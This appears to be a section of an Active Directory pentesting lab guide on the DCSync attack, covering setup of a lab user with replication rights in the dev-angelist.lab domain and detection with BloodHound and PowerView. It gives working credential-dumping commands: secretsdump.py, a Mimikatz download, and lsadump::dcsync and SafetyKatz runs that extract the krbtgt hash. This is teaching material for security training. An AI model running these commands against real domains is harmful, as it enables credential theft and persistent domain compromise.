8.7.2 - DCSync Attack

DCSynk Attack

DCSynk Attack is a tecnique used in post-exploitation scenarios in order to extract sensitive data from an AD domain by abusing the AD replication feature, which guide how DC synchronize data between themselves.

The DCSync attack trucks a DC into thinking the attacker is another legitimate DC that needs replication data.

The replication data extract with this attack includes:

• NTLM password hashes (including krbtgt)

• Kerberos key

• Password hystory

So, DCSync can be combined with other attacks, such as the Golden Ticket attack, to establish persistance into a domain

Configuration of a vulnerable user

Go into Domain Controller account:

• Open Active Directory Users and Computers

• Click on DC: dev-angelist.lab -> Properties -> Security -> Add (devan), Check Names, Ok

Select devan user and mark as allow these three permissions:

• Replicating Directory Changes

• Replicating Directory Changes All

• Replicating Directory Changes In Filtered Set

and confirm.

In alternative is possible to set them using AD module command:

Import-Module .\RACE.ps1

Set-ADACL -SamAccountName devan `
-GUIDRight DCSync `
-DistinguishedName 'DC=dev-angelist,DC=lab' `
-Verbose

Check if a machine is vulnerable to DCSync attack

We can check if all go right using BloodHound:

python3 -m venv venv
. venv/bin/activate
pip3 install bloodhound

bloodhound-python -u administrator -p 'P@$$W0rd' -ns 192.168.57.9 -d dev-angelist.lab -c All --zip

we can common upload it ang log-in using neo4j or using bloodhound-cli tool:

wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
./bloodhound-cli containers start
#Access to Bloodhound UI at: http://127.0.0.1:8080/ui/login
#Go to file ingest and upload bloodhound zip file generated
#And check: Dangerous Privileges -> Principals with DCSync privileges

If there're "AllExtendedRights" and "GenericAll" permissions we can perform DCSync Attack.

In alternative, we can use PowerView (if we've access to Devan machine):

Get-ObjectAcl -SamAccountName devan -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "Replicating"}

or we can check it on attacker machine (linux / kali) using Secretsdump module of Impacket:

secretsdump.py 'devan:new_password123'@192.168.57.9

Mimikatz

Let's assume we've a low privileged access to a workstation joined into the domain, in my case i log into: dev-angelist\devan's account.

Download and extract Mimikatz:

iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#Win32 Folder in this case, because this machine is 32bit

and run it to leak the NTLM hash of krbtgt user:

.\mimikatz.exe
lsadump::dcsync /domain:dev-angelist.lab /user:krbtgt" "exit"

Using Safetykatz

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"

Labs

• Learning Object 12 lab